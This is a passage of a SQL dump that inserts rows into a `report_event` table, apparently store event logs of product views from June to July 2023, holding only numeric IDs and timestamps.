(5204, '2023-06-12 22:48:55', 1, 2060, 0, 1, 1),
(5205, '2023-06-12 22:49:08', 1, 2059, 0, 1, 1),
(5206, '2023-06-12 22:49:20', 1, 2058, 0, 1, 1),
(5207, '2023-06-12 22:49:33', 1, 2055, 0, 1, 1),
(5208, '2023-06-12 22:49:48', 1, 2054, 0, 1, 1),
(5209, '2023-06-12 23:05:43', 1, 2053, 0, 1, 1),
(5210, '2023-06-13 07:47:14', 1, 2055, 0, 1, 1),
(5211, '2023-06-13 19:47:18', 1, 2063, 0, 1, 1),
(5212, '2023-06-14 02:52:14', 1, 2063, 0, 1, 1),
(5213, '2023-06-14 10:56:47', 1, 2060, 0, 1, 1),
(5214, '2023-06-14 12:03:25', 1, 2058, 0, 1, 1),
(5215, '2023-06-14 12:03:26', 1, 2059, 0, 1, 1),
(5216, '2023-06-14 12:03:27', 1, 2062, 0, 1, 1),
(5217, '2023-06-14 12:03:28', 1, 2055, 0, 1, 1),
(5218, '2023-06-14 12:03:29', 1, 2063, 0, 1, 1),
(5219, '2023-06-14 12:03:30', 1, 2054, 0, 1, 1),
(5220, '2023-06-14 12:03:31', 1, 2064, 0, 1, 1),
(5221, '2023-06-14 12:03:33', 1, 2061, 0, 1, 1),
(5222, '2023-06-14 12:03:34', 1, 2060, 0, 1, 1),
(5223, '2023-06-14 12:03:43', 1, 2053, 0, 1, 1),
(5224, '2023-06-14 12:27:30', 1, 2064, 0, 1, 1),
(5225, '2023-06-15 03:51:10', 1, 2063, 0, 1, 1),
(5226, '2023-06-16 15:44:04', 1, 2059, 0, 1, 1),
(5227, '2023-06-17 00:15:07', 1, 2062, 0, 1, 1),
(5228, '2023-06-17 06:03:57', 1, 2060, 0, 1, 1),
(5229, '2023-06-17 06:12:30', 1, 2063, 0, 1, 1),
(5230, '2023-06-17 06:33:44', 1, 2058, 0, 1, 1),
(5231, '2023-06-17 07:10:55', 1, 2055, 0, 1, 1),
(5232, '2023-06-17 08:23:51', 1, 2061, 0, 1, 1),
(5233, '2023-06-17 09:04:26', 1, 2062, 0, 1, 1),
(5234, '2023-06-17 10:22:47', 1, 2054, 0, 1, 1),
(5235, '2023-06-17 10:40:17', 1, 2059, 0, 1, 1),
(5236, '2023-06-17 10:54:26', 1, 2064, 0, 1, 1),
(5237, '2023-06-17 13:58:43', 1, 2061, 0, 1, 1),
(5238, '2023-06-17 18:42:37', 1, 2054, 0, 1, 1),
(5239, '2023-06-17 23:44:09', 1, 2064, 0, 1, 1),
(5240, '2023-06-17 23:47:48', 1, 2059, 0, 1, 1),
(5241, '2023-06-18 01:45:01', 1, 2054, 0, 1, 1),
(5242, '2023-06-18 01:50:25', 1, 2063, 0, 1, 1),
(5243, '2023-06-18 02:37:34', 1, 2055, 0, 1, 1),
(5244, '2023-06-18 02:41:12', 1, 2059, 0, 1, 1),
(5245, '2023-06-18 02:46:54', 1, 2055, 0, 1, 1),
(5246, '2023-06-18 15:05:23', 1, 2053, 0, 1, 1),
(5247, '2023-06-18 16:34:48', 1, 2064, 0, 1, 1),
(5248, '2023-06-18 16:35:37', 1, 2059, 0, 1, 1),
(5249, '2023-06-18 18:06:23', 1, 2059, 0, 1, 1),
(5250, '2023-06-18 20:24:36', 1, 2060, 0, 1, 1),
(5251, '2023-06-18 20:30:46', 1, 2060, 0, 1, 1),
(5252, '2023-06-18 23:48:41', 1, 2061, 68, 0, 1),
(5253, '2023-06-19 04:59:33', 1, 2061, 0, 1, 1),
(5254, '2023-06-19 05:15:16', 1, 2060, 0, 1, 1),
(5255, '2023-06-19 05:15:21', 1, 2063, 0, 1, 1),
(5256, '2023-06-19 05:15:21', 1, 2061, 0, 1, 1),
(5257, '2023-06-19 05:15:25', 1, 2059, 0, 1, 1),
(5258, '2023-06-19 05:15:26', 1, 2055, 0, 1, 1),
(5259, '2023-06-19 05:15:27', 1, 2062, 0, 1, 1),
(5260, '2023-06-19 05:15:28', 1, 2058, 0, 1, 1),
(5261, '2023-06-19 05:15:29', 1, 2064, 0, 1, 1),
(5262, '2023-06-19 05:15:30', 1, 2054, 0, 1, 1),
(5263, '2023-06-19 06:07:39', 1, 2061, 0, 1, 1),
(5264, '2023-06-19 09:04:38', 1, 2064, 0, 1, 1),
(5265, '2023-06-19 10:46:11', 1, 2061, 0, 1, 1),
(5266, '2023-06-19 14:40:49', 1, 2054, 0, 1, 1),
(5267, '2023-06-19 14:51:33', 1, 2061, 0, 1, 1),
(5268, '2023-06-19 14:54:33', 1, 2060, 0, 1, 1),
(5269, '2023-06-19 14:58:21', 1, 2059, 0, 1, 1),
(5270, '2023-06-19 16:21:57', 1, 2058, 0, 1, 1),
(5271, '2023-06-19 16:22:47', 1, 2062, 0, 1, 1),
(5272, '2023-06-19 16:24:16', 1, 2055, 0, 1, 1),
(5273, '2023-06-19 16:24:29', 1, 2059, 0, 1, 1),
(5274, '2023-06-19 16:26:05', 1, 2060, 0, 1, 1),
(5275, '2023-06-19 16:27:13', 1, 2061, 0, 1, 1),
(5276, '2023-06-19 16:32:54', 1, 2054, 0, 1, 1),
(5277, '2023-06-19 16:36:48', 1, 2061, 0, 1, 1),
(5278, '2023-06-19 16:37:19', 1, 2063, 0, 1, 1),
(5279, '2023-06-19 16:37:30', 1, 2062, 0, 1, 1),
(5280, '2023-06-19 16:47:44', 1, 2059, 0, 1, 1),
(5281, '2023-06-19 16:50:42', 1, 2055, 0, 1, 1),
(5282, '2023-06-19 16:54:22', 1, 2058, 0, 1, 1),
(5283, '2023-06-19 16:58:18', 1, 2063, 0, 1, 1),
(5284, '2023-06-19 17:03:23', 1, 2054, 0, 1, 1),
(5285, '2023-06-19 17:22:15', 1, 2064, 0, 1, 1),
(5286, '2023-06-19 17:28:34', 1, 2060, 0, 1, 1),
(5287, '2023-06-19 17:32:49', 1, 2064, 0, 1, 1),
(5288, '2023-06-20 03:09:56', 1, 2058, 0, 1, 1),
(5289, '2023-06-20 03:10:11', 1, 2061, 0, 1, 1),
(5290, '2023-06-20 03:10:21', 1, 2059, 0, 1, 1),
(5291, '2023-06-20 03:10:29', 1, 2060, 0, 1, 1),
(5292, '2023-06-20 03:10:38', 1, 2062, 0, 1, 1),
(5293, '2023-06-20 03:10:46', 1, 2063, 0, 1, 1),
(5294, '2023-06-20 03:10:53', 1, 2064, 0, 1, 1),
(5295, '2023-06-20 03:12:00', 1, 2055, 0, 1, 1),
(5296, '2023-06-20 03:12:12', 1, 2054, 0, 1, 1),
(5297, '2023-06-20 03:12:25', 1, 2053, 0, 1, 1),
(5298, '2023-06-20 04:17:51', 1, 2058, 0, 1, 1),
(5299, '2023-06-20 04:18:05', 1, 2061, 0, 1, 1),
(5300, '2023-06-20 04:18:19', 1, 2059, 0, 1, 1),
(5301, '2023-06-20 04:18:34', 1, 2060, 0, 1, 1),
(5302, '2023-06-20 04:18:49', 1, 2062, 0, 1, 1),
(5303, '2023-06-20 04:19:06', 1, 2063, 0, 1, 1),
(5304, '2023-06-20 04:19:27', 1, 2064, 0, 1, 1),
(5305, '2023-06-20 04:21:00', 1, 2055, 0, 1, 1),
(5306, '2023-06-20 04:21:11', 1, 2054, 0, 1, 1),
(5307, '2023-06-20 04:21:21', 1, 2053, 0, 1, 1),
(5308, '2023-06-21 04:02:07', 1, 2061, 0, 1, 1),
(5309, '2023-06-21 05:08:01', 1, 2060, 0, 1, 1),
(5310, '2023-06-21 18:46:09', 1, 2062, 0, 1, 1),
(5311, '2023-06-21 20:12:58', 1, 2062, 0, 1, 1),
(5312, '2023-06-21 21:39:45', 1, 2060, 0, 1, 1),
(5313, '2023-06-21 23:47:51', 1, 2059, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(5314, '2023-06-22 03:44:50', 1, 2055, 0, 1, 1),
(5315, '2023-06-22 04:42:55', 1, 2063, 0, 1, 1),
(5316, '2023-06-22 10:51:56', 1, 2061, 0, 1, 1),
(5317, '2023-06-22 10:51:58', 1, 2054, 0, 1, 1),
(5318, '2023-06-22 13:15:29', 1, 2062, 0, 1, 1),
(5319, '2023-06-22 13:15:58', 1, 2062, 0, 1, 1),
(5320, '2023-06-22 15:54:33', 1, 2063, 0, 1, 1),
(5321, '2023-06-22 20:26:22', 1, 2061, 0, 1, 1),
(5322, '2023-06-22 20:39:55', 1, 2055, 0, 1, 1),
(5323, '2023-06-22 20:53:40', 1, 2059, 0, 1, 1),
(5324, '2023-06-22 20:55:10', 1, 2060, 0, 1, 1),
(5325, '2023-06-23 09:11:43', 1, 2059, 0, 1, 1),
(5326, '2023-06-23 13:57:52', 1, 2064, 0, 1, 1),
(5327, '2023-06-23 16:46:28', 1, 2064, 0, 1, 1),
(5328, '2023-06-23 17:50:17', 1, 2061, 0, 1, 1),
(5329, '2023-06-23 18:08:59', 1, 2062, 0, 1, 1),
(5330, '2023-06-23 18:34:32', 1, 2063, 0, 1, 1),
(5331, '2023-06-23 21:47:43', 1, 2060, 0, 1, 1),
(5332, '2023-06-23 22:11:40', 1, 2054, 0, 1, 1),
(5333, '2023-06-24 01:20:01', 1, 2055, 0, 1, 1),
(5334, '2023-06-24 02:43:58', 1, 2059, 0, 1, 1),
(5335, '2023-06-24 02:48:00', 1, 2062, 0, 1, 1),
(5336, '2023-06-24 06:43:54', 1, 2059, 0, 1, 1),
(5337, '2023-06-24 12:11:58', 1, 2058, 0, 1, 1),
(5338, '2023-06-24 13:43:25', 1, 2064, 0, 1, 1),
(5339, '2023-06-24 19:02:11', 1, 2059, 0, 1, 1),
(5340, '2023-06-24 20:31:08', 1, 2059, 0, 1, 1),
(5341, '2023-06-24 20:39:56', 1, 2055, 0, 1, 1),
(5342, '2023-06-24 21:29:25', 1, 2059, 0, 1, 1),
(5343, '2023-06-24 22:38:09', 1, 2054, 0, 1, 1),
(5344, '2023-06-25 04:26:23', 1, 2063, 0, 1, 1),
(5345, '2023-06-25 10:54:32', 1, 2063, 0, 1, 1),
(5346, '2023-06-25 11:57:41', 1, 2058, 0, 1, 1),
(5347, '2023-06-25 12:24:24', 1, 2064, 0, 1, 1),
(5348, '2023-06-25 15:49:51', 1, 2053, 0, 1, 1),
(5349, '2023-06-25 16:46:48', 1, 2053, 0, 1, 1),
(5350, '2023-06-25 17:18:34', 1, 2063, 0, 1, 1),
(5351, '2023-06-25 19:40:15', 1, 2054, 0, 1, 1),
(5352, '2023-06-25 22:49:01', 1, 2062, 0, 1, 1),
(5353, '2023-06-26 02:34:52', 1, 2060, 0, 1, 1),
(5354, '2023-06-26 10:27:39', 1, 2064, 0, 1, 1),
(5355, '2023-06-26 12:26:57', 1, 2054, 0, 1, 1),
(5356, '2023-06-26 19:52:33', 1, 2062, 0, 1, 1),
(5357, '2023-06-26 22:20:51', 1, 2064, 0, 1, 1),
(5358, '2023-06-27 05:04:15', 1, 2064, 0, 1, 1),
(5359, '2023-06-27 05:04:15', 1, 2064, 0, 1, 1),
(5360, '2023-06-27 06:46:48', 1, 2064, 0, 1, 1),
(5361, '2023-06-27 08:03:51', 1, 2058, 0, 1, 1),
(5362, '2023-06-27 13:01:31', 1, 2061, 0, 1, 1),
(5363, '2023-06-27 17:07:46', 1, 2060, 0, 1, 1),
(5364, '2023-06-27 18:48:58', 1, 2062, 0, 1, 1),
(5365, '2023-06-27 18:49:37', 1, 2062, 0, 1, 1),
(5366, '2023-06-27 18:55:37', 1, 2062, 0, 1, 1),
(5367, '2023-06-27 18:55:38', 1, 2062, 0, 1, 1),
(5368, '2023-06-27 18:56:11', 4, 2062, 0, 1, 1),
(5369, '2023-06-27 18:56:12', 4, 2062, 0, 1, 1),
(5370, '2023-06-27 19:05:04', 1, 2062, 0, 1, 1),
(5371, '2023-06-27 19:05:12', 1, 2062, 0, 1, 1),
(5372, '2023-06-27 19:05:32', 1, 2062, 0, 1, 1),
(5373, '2023-06-27 19:06:44', 1, 2062, 0, 1, 1),
(5374, '2023-06-27 19:06:57', 1, 2062, 0, 1, 1),
(5375, '2023-06-27 19:07:03', 1, 2062, 0, 1, 1),
(5376, '2023-06-27 19:07:44', 4, 2062, 0, 1, 1),
(5377, '2023-06-27 19:08:00', 4, 2062, 0, 1, 1),
(5378, '2023-06-27 19:14:35', 1, 2062, 0, 1, 1),
(5379, '2023-06-27 19:14:51', 1, 2062, 0, 1, 1),
(5380, '2023-06-27 19:20:58', 1, 2062, 0, 1, 1),
(5381, '2023-06-27 19:20:59', 1, 2062, 0, 1, 1),
(5382, '2023-06-27 19:22:24', 1, 2062, 0, 1, 1),
(5383, '2023-06-27 19:22:51', 1, 2062, 0, 1, 1),
(5384, '2023-06-27 19:23:17', 4, 2062, 0, 1, 1),
(5385, '2023-06-27 19:23:29', 4, 2062, 0, 1, 1),
(5386, '2023-06-27 19:29:16', 1, 2062, 0, 1, 1),
(5387, '2023-06-27 19:32:54', 1, 2062, 0, 1, 1),
(5388, '2023-06-27 19:42:59', 1, 2062, 0, 1, 1),
(5389, '2023-06-27 19:43:00', 1, 2062, 0, 1, 1),
(5390, '2023-06-27 19:44:26', 1, 2062, 0, 1, 1),
(5391, '2023-06-27 19:44:39', 1, 2062, 0, 1, 1),
(5392, '2023-06-27 19:45:20', 4, 2062, 0, 1, 1),
(5393, '2023-06-27 19:45:40', 4, 2062, 0, 1, 1),
(5394, '2023-06-27 19:50:59', 1, 2062, 0, 1, 1),
(5395, '2023-06-27 19:51:49', 1, 2062, 0, 1, 1),
(5396, '2023-06-27 19:58:57', 1, 2062, 0, 1, 1),
(5397, '2023-06-27 19:59:04', 1, 2062, 0, 1, 1),
(5398, '2023-06-27 20:00:04', 1, 2062, 0, 1, 1),
(5399, '2023-06-27 20:00:18', 1, 2062, 0, 1, 1),
(5400, '2023-06-27 20:00:54', 4, 2062, 0, 1, 1),
(5401, '2023-06-27 20:01:14', 4, 2062, 0, 1, 1),
(5402, '2023-06-27 20:05:43', 1, 2062, 0, 1, 1),
(5403, '2023-06-27 20:06:17', 1, 2062, 0, 1, 1),
(5404, '2023-06-27 20:14:57', 1, 2062, 0, 1, 1),
(5405, '2023-06-27 20:16:26', 1, 2062, 0, 1, 1),
(5406, '2023-06-27 20:17:28', 4, 2062, 0, 1, 1),
(5407, '2023-06-27 20:24:25', 1, 2062, 0, 1, 1),
(5408, '2023-06-28 01:27:38', 1, 2060, 0, 1, 1),
(5409, '2023-06-28 08:08:43', 1, 2061, 0, 1, 1),
(5410, '2023-06-28 09:44:45', 1, 2059, 0, 1, 1),
(5411, '2023-06-28 11:49:43', 1, 2059, 0, 1, 1),
(5412, '2023-06-28 12:12:13', 1, 2062, 0, 1, 1),
(5413, '2023-06-28 19:26:56', 1, 2062, 0, 1, 1),
(5414, '2023-06-29 02:17:56', 1, 2064, 0, 1, 1),
(5415, '2023-06-29 10:05:52', 1, 2060, 0, 1, 1),
(5416, '2023-06-29 11:25:05', 1, 2054, 0, 1, 1),
(5417, '2023-06-29 12:11:36', 1, 2055, 0, 1, 1),
(5418, '2023-06-29 18:04:43', 1, 2058, 0, 1, 1),
(5419, '2023-06-29 18:19:23', 1, 2055, 0, 1, 1),
(5420, '2023-06-29 19:47:20', 1, 2063, 0, 1, 1),
(5421, '2023-06-29 23:01:17', 1, 2064, 0, 1, 1),
(5422, '2023-06-30 04:02:59', 1, 2054, 0, 1, 1),
(5423, '2023-06-30 05:52:01', 1, 2055, 0, 1, 1),
(5424, '2023-06-30 11:12:35', 1, 2063, 0, 1, 1),
(5425, '2023-06-30 11:12:41', 1, 2063, 0, 1, 1),
(5426, '2023-06-30 15:21:04', 1, 2058, 0, 1, 1),
(5427, '2023-06-30 20:19:15', 1, 2064, 0, 1, 1),
(5428, '2023-06-30 22:35:07', 1, 2062, 0, 1, 1),
(5429, '2023-07-01 02:08:23', 1, 2063, 0, 1, 1),
(5430, '2023-07-01 02:22:27', 1, 2061, 0, 1, 1),
(5431, '2023-07-01 03:11:00', 1, 2054, 0, 1, 1),
(5432, '2023-07-01 04:13:04', 1, 2060, 0, 1, 1),
(5433, '2023-07-01 04:16:56', 1, 2061, 0, 1, 1),
(5434, '2023-07-01 04:42:07', 1, 2062, 0, 1, 1),
(5435, '2023-07-01 05:20:40', 1, 2061, 0, 1, 1),
(5436, '2023-07-01 07:04:46', 1, 2059, 0, 1, 1),
(5437, '2023-07-01 07:33:44', 1, 2054, 0, 1, 1),
(5438, '2023-07-01 08:07:29', 1, 2060, 0, 1, 1),
(5439, '2023-07-01 08:43:57', 1, 2061, 0, 1, 1),
(5440, '2023-07-01 09:42:12', 1, 2059, 0, 1, 1),
(5441, '2023-07-01 10:29:14', 1, 2064, 0, 1, 1),
(5442, '2023-07-01 11:14:05', 1, 2062, 0, 1, 1),
(5443, '2023-07-01 12:27:04', 1, 2055, 0, 1, 1),
(5444, '2023-07-01 13:19:55', 1, 2063, 0, 1, 1),
(5445, '2023-07-01 13:36:16', 1, 2058, 0, 1, 1),
(5446, '2023-07-01 16:59:48', 1, 2054, 0, 1, 1),
(5447, '2023-07-01 17:35:04', 1, 2060, 0, 1, 1),
(5448, '2023-07-01 18:12:54', 1, 2061, 0, 1, 1),
(5449, '2023-07-01 18:22:42', 1, 2055, 0, 1, 1),
(5450, '2023-07-01 19:41:18', 1, 2054, 0, 1, 1),
(5451, '2023-07-01 20:41:29', 1, 2060, 0, 1, 1),
(5452, '2023-07-01 20:59:43', 1, 2062, 0, 1, 1),
(5453, '2023-07-01 21:46:56', 1, 2061, 0, 1, 1),
(5454, '2023-07-01 23:25:57', 1, 2059, 0, 1, 1),
(5455, '2023-07-02 00:40:43', 1, 2064, 0, 1, 1),
(5456, '2023-07-02 01:52:55', 1, 2062, 0, 1, 1),
(5457, '2023-07-02 03:46:23', 1, 2055, 0, 1, 1),
(5458, '2023-07-02 04:54:35', 1, 2053, 0, 1, 1),
(5459, '2023-07-02 05:13:40', 1, 2063, 0, 1, 1),
(5460, '2023-07-02 05:39:49', 1, 2058, 0, 1, 1),
(5461, '2023-07-02 06:49:35', 1, 2062, 0, 1, 1),
(5462, '2023-07-02 07:13:05', 1, 2053, 0, 1, 1),
(5463, '2023-07-02 07:13:09', 1, 2054, 0, 1, 1),
(5464, '2023-07-02 07:13:14', 1, 2055, 0, 1, 1),
(5465, '2023-07-02 07:13:30', 1, 2064, 0, 1, 1),
(5466, '2023-07-02 07:13:39', 1, 2063, 0, 1, 1),
(5467, '2023-07-02 07:13:42', 1, 2062, 0, 1, 1),
(5468, '2023-07-02 07:13:45', 1, 2060, 0, 1, 1),
(5469, '2023-07-02 07:13:49', 1, 2059, 0, 1, 1),
(5470, '2023-07-02 07:13:53', 1, 2061, 0, 1, 1),
(5471, '2023-07-02 07:13:57', 1, 2058, 0, 1, 1),
(5472, '2023-07-02 07:15:27', 1, 2061, 0, 1, 1),
(5473, '2023-07-02 07:20:11', 1, 2058, 0, 1, 1),
(5474, '2023-07-02 07:26:08', 1, 2061, 0, 1, 1),
(5475, '2023-07-02 08:45:50', 1, 2061, 0, 1, 1),
(5476, '2023-07-02 10:51:00', 1, 2059, 0, 1, 1),
(5477, '2023-07-02 11:12:20', 1, 2054, 0, 1, 1),
(5478, '2023-07-02 14:50:47', 1, 2058, 0, 1, 1),
(5479, '2023-07-02 17:37:30', 1, 2054, 0, 1, 1),
(5480, '2023-07-03 00:09:20', 1, 2058, 0, 1, 1),
(5481, '2023-07-03 15:57:48', 1, 2062, 0, 1, 1),
(5482, '2023-07-04 04:59:31', 1, 2054, 0, 1, 1),
(5483, '2023-07-04 04:59:36', 1, 2060, 0, 1, 1),
(5484, '2023-07-04 04:59:39', 1, 2061, 0, 1, 1),
(5485, '2023-07-04 04:59:42', 1, 2059, 0, 1, 1),
(5486, '2023-07-04 04:59:45', 1, 2064, 0, 1, 1),
(5487, '2023-07-04 04:59:49', 1, 2062, 0, 1, 1),
(5488, '2023-07-04 05:00:20', 1, 2055, 0, 1, 1),
(5489, '2023-07-04 05:00:52', 1, 2063, 0, 1, 1),
(5490, '2023-07-04 05:01:00', 1, 2058, 0, 1, 1),
(5491, '2023-07-04 09:30:09', 1, 2063, 0, 1, 1),
(5492, '2023-07-04 12:20:57', 1, 2062, 0, 1, 1),
(5493, '2023-07-04 12:21:02', 1, 2059, 0, 1, 1),
(5494, '2023-07-04 12:21:08', 1, 2064, 0, 1, 1),
(5495, '2023-07-04 12:21:23', 1, 2061, 0, 1, 1),
(5496, '2023-07-04 12:21:38', 1, 2063, 0, 1, 1),
(5497, '2023-07-04 12:21:45', 1, 2055, 0, 1, 1),
(5498, '2023-07-04 12:22:03', 1, 2054, 0, 1, 1),
(5499, '2023-07-04 15:54:55', 1, 2061, 0, 1, 1),
(5500, '2023-07-04 19:34:09', 4, 2061, 935, 1, 1),
(5501, '2023-07-04 21:33:57', 1, 2058, 0, 1, 1),
(5502, '2023-07-04 21:34:14', 1, 2064, 0, 1, 1),
(5503, '2023-07-04 21:34:29', 1, 2062, 0, 1, 1),
(5504, '2023-07-04 21:34:32', 1, 2055, 0, 1, 1),
(5505, '2023-07-04 21:34:37', 1, 2059, 0, 1, 1),
(5506, '2023-07-04 21:34:40', 1, 2063, 0, 1, 1),
(5507, '2023-07-04 21:34:43', 1, 2061, 0, 1, 1),
(5508, '2023-07-04 21:34:51', 1, 2054, 0, 1, 1),
(5509, '2023-07-04 21:34:56', 1, 2060, 0, 1, 1),
(5510, '2023-07-04 21:36:57', 1, 2058, 0, 1, 1),
(5511, '2023-07-04 21:37:09', 1, 2064, 0, 1, 1),
(5512, '2023-07-04 21:37:14', 1, 2062, 0, 1, 1),
(5513, '2023-07-04 21:37:16', 1, 2055, 0, 1, 1),
(5514, '2023-07-04 21:37:22', 1, 2059, 0, 1, 1),
(5515, '2023-07-04 21:37:24', 1, 2063, 0, 1, 1),
(5516, '2023-07-04 21:37:26', 1, 2061, 0, 1, 1),
(5517, '2023-07-04 21:37:31', 1, 2060, 0, 1, 1),
(5518, '2023-07-04 21:37:35', 1, 2054, 0, 1, 1),
(5519, '2023-07-04 21:37:55', 1, 2053, 0, 1, 1),
(5520, '2023-07-04 23:36:47', 1, 2055, 0, 1, 1),
(5521, '2023-07-05 01:21:24', 1, 2055, 0, 1, 1),
(5522, '2023-07-05 01:23:29', 1, 2064, 0, 1, 1),
(5523, '2023-07-05 01:23:38', 1, 2063, 0, 1, 1),
(5524, '2023-07-05 01:23:48', 1, 2062, 0, 1, 1),
(5525, '2023-07-05 01:23:53', 1, 2060, 0, 1, 1),
(5526, '2023-07-05 17:11:41', 1, 2063, 0, 1, 1),
(5527, '2023-07-05 20:42:36', 1, 2059, 0, 1, 1),
(5528, '2023-07-05 20:50:41', 1, 2054, 0, 1, 1),
(5529, '2023-07-05 23:48:46', 1, 2064, 0, 1, 1),
(5530, '2023-07-06 04:10:10', 1, 2060, 0, 1, 1),
(5531, '2023-07-06 05:32:59', 1, 2054, 0, 1, 1),
(5532, '2023-07-06 06:06:11', 1, 2060, 0, 1, 1),
(5533, '2023-07-06 06:42:29', 1, 2061, 0, 1, 1),
(5534, '2023-07-06 07:46:53', 1, 2054, 0, 1, 1),
(5535, '2023-07-06 08:20:38', 1, 2060, 0, 1, 1),
(5536, '2023-07-06 08:57:28', 1, 2061, 0, 1, 1),
(5537, '2023-07-06 09:57:31', 1, 2059, 0, 1, 1),
(5538, '2023-07-06 10:45:45', 1, 2062, 0, 1, 1),
(5539, '2023-07-06 10:45:53', 1, 2064, 0, 1, 1),
(5540, '2023-07-06 11:33:24', 1, 2062, 0, 1, 1),
(5541, '2023-07-06 12:49:53', 1, 2055, 0, 1, 1),
(5542, '2023-07-06 13:46:58', 1, 2063, 0, 1, 1),
(5543, '2023-07-06 14:04:15', 1, 2058, 0, 1, 1),
(5544, '2023-07-06 15:15:58', 1, 2063, 0, 1, 1),
(5545, '2023-07-06 16:33:05', 1, 2059, 0, 1, 1),
(5546, '2023-07-06 16:33:06', 1, 2054, 0, 1, 1),
(5547, '2023-07-06 16:33:08', 1, 2058, 0, 1, 1),
(5548, '2023-07-06 16:33:09', 1, 2061, 0, 1, 1),
(5549, '2023-07-06 16:33:11', 1, 2062, 0, 1, 1),
(5550, '2023-07-06 16:33:11', 1, 2064, 0, 1, 1),
(5551, '2023-07-06 16:33:12', 1, 2064, 0, 1, 1),
(5552, '2023-07-06 16:33:14', 1, 2053, 0, 1, 1),
(5553, '2023-07-06 16:33:15', 1, 2060, 0, 1, 1),
(5554, '2023-07-06 16:33:16', 1, 2064, 0, 1, 1),
(5555, '2023-07-06 16:33:17', 1, 2063, 0, 1, 1),
(5556, '2023-07-06 16:33:18', 1, 2053, 0, 1, 1),
(5557, '2023-07-06 16:33:20', 1, 2055, 0, 1, 1),
(5558, '2023-07-06 16:33:22', 1, 2053, 0, 1, 1),
(5559, '2023-07-07 01:48:39', 1, 2059, 0, 1, 1),
(5560, '2023-07-07 02:56:46', 1, 2064, 0, 1, 1),
(5561, '2023-07-07 09:48:17', 1, 2062, 0, 1, 1),
(5562, '2023-07-07 16:48:17', 1, 2062, 0, 1, 1),
(5563, '2023-07-07 16:49:07', 1, 2054, 0, 1, 1),
(5564, '2023-07-07 17:57:54', 1, 2060, 0, 1, 1),
(5565, '2023-07-08 10:03:17', 1, 2054, 0, 1, 1),
(5566, '2023-07-09 15:14:37', 1, 2059, 0, 1, 1),
(5567, '2023-07-09 18:03:29', 1, 2063, 0, 1, 1),
(5568, '2023-07-10 01:17:32', 1, 2062, 0, 1, 1),
(5569, '2023-07-10 04:04:31', 1, 2064, 0, 1, 1),
(5570, '2023-07-10 07:34:58', 1, 2061, 0, 1, 1),
(5571, '2023-07-10 14:00:33', 1, 2061, 0, 1, 1),
(5572, '2023-07-10 15:04:09', 1, 2055, 0, 1, 1),
(5573, '2023-07-10 16:03:06', 1, 2064, 0, 1, 1),
(5574, '2023-07-10 17:34:34', 1, 2064, 0, 1, 1),
(5575, '2023-07-11 02:41:40', 1, 2062, 0, 1, 1),
(5576, '2023-07-11 02:41:44', 1, 2062, 0, 1, 1),
(5577, '2023-07-11 07:35:43', 1, 2059, 0, 1, 1),
(5578, '2023-07-11 08:25:01', 1, 2060, 0, 1, 1),
(5579, '2023-07-11 12:02:39', 1, 2062, 0, 1, 1),
(5580, '2023-07-11 12:04:24', 1, 2054, 0, 1, 1),
(5581, '2023-07-11 16:05:27', 1, 2061, 0, 1, 1),
(5582, '2023-07-11 16:32:06', 4, 2061, 951, 1, 1),
(5583, '2023-07-12 01:58:21', 1, 2063, 0, 1, 1),
(5584, '2023-07-12 09:42:12', 1, 2059, 0, 1, 1),
(5585, '2023-07-12 11:40:08', 1, 2060, 0, 1, 1),
(5586, '2023-07-12 13:02:08', 1, 2063, 0, 1, 1),
(5587, '2023-07-12 14:03:01', 1, 2061, 0, 1, 1),
(5588, '2023-07-12 20:11:59', 1, 2058, 0, 1, 1),
(5589, '2023-07-12 20:43:23', 1, 2060, 0, 1, 1),
(5590, '2023-07-12 21:33:14', 1, 2064, 0, 1, 1),
(5591, '2023-07-13 00:49:53', 1, 2055, 0, 1, 1),
(5592, '2023-07-13 06:51:21', 1, 2055, 0, 1, 1),
(5593, '2023-07-13 11:17:10', 1, 2061, 0, 1, 1),
(5594, '2023-07-13 18:13:51', 1, 2055, 0, 1, 1),
(5595, '2023-07-14 01:06:36', 1, 2055, 0, 1, 1),
(5596, '2023-07-14 01:45:44', 1, 2064, 0, 1, 1),
(5597, '2023-07-14 07:37:26', 1, 2060, 0, 1, 1),
(5598, '2023-07-14 07:37:30', 1, 2055, 0, 1, 1),
(5599, '2023-07-14 07:37:31', 1, 2058, 0, 1, 1),
(5600, '2023-07-14 07:37:32', 1, 2064, 0, 1, 1),
(5601, '2023-07-14 07:37:34', 1, 2063, 0, 1, 1),
(5602, '2023-07-14 07:37:35', 1, 2061, 0, 1, 1),
(5603, '2023-07-14 07:37:42', 1, 2054, 0, 1, 1),
(5604, '2023-07-14 07:37:42', 1, 2059, 0, 1, 1),
(5605, '2023-07-14 07:37:44', 1, 2062, 0, 1, 1),
(5606, '2023-07-14 12:02:19', 1, 2063, 0, 1, 1),
(5607, '2023-07-14 12:02:53', 1, 2053, 0, 1, 1),
(5608, '2023-07-14 12:53:46', 1, 2062, 0, 1, 1),
(5609, '2023-07-14 19:27:48', 1, 2054, 0, 1, 1),
(5610, '2023-07-14 19:29:24', 1, 2059, 0, 1, 1),
(5611, '2023-07-15 03:06:52', 1, 2063, 0, 1, 1),
(5612, '2023-07-15 04:53:40', 1, 2064, 0, 1, 1),
(5613, '2023-07-15 16:05:42', 1, 2054, 0, 1, 1),
(5614, '2023-07-15 16:05:43', 1, 2064, 0, 1, 1),
(5615, '2023-07-15 17:56:43', 1, 2064, 0, 1, 1),
(5616, '2023-07-16 02:01:31', 1, 2053, 0, 1, 1),
(5617, '2023-07-16 03:38:58', 1, 2062, 0, 1, 1),
(5618, '2023-07-16 10:01:41', 1, 2059, 0, 1, 1),
(5619, '2023-07-16 10:16:07', 1, 2060, 0, 1, 1),
(5620, '2023-07-16 10:18:13', 1, 2054, 0, 1, 1),
(5621, '2023-07-17 02:49:46', 1, 2054, 0, 1, 1),
(5622, '2023-07-17 02:49:56', 1, 2055, 0, 1, 1),
(5623, '2023-07-17 02:50:12', 1, 2064, 0, 1, 1),
(5624, '2023-07-17 02:50:24', 1, 2063, 0, 1, 1),
(5625, '2023-07-17 02:50:30', 1, 2062, 0, 1, 1),
(5626, '2023-07-17 02:50:37', 1, 2060, 0, 1, 1),
(5627, '2023-07-17 02:50:43', 1, 2059, 0, 1, 1),
(5628, '2023-07-17 02:50:49', 1, 2061, 0, 1, 1),
(5629, '2023-07-17 02:50:58', 1, 2058, 0, 1, 1),
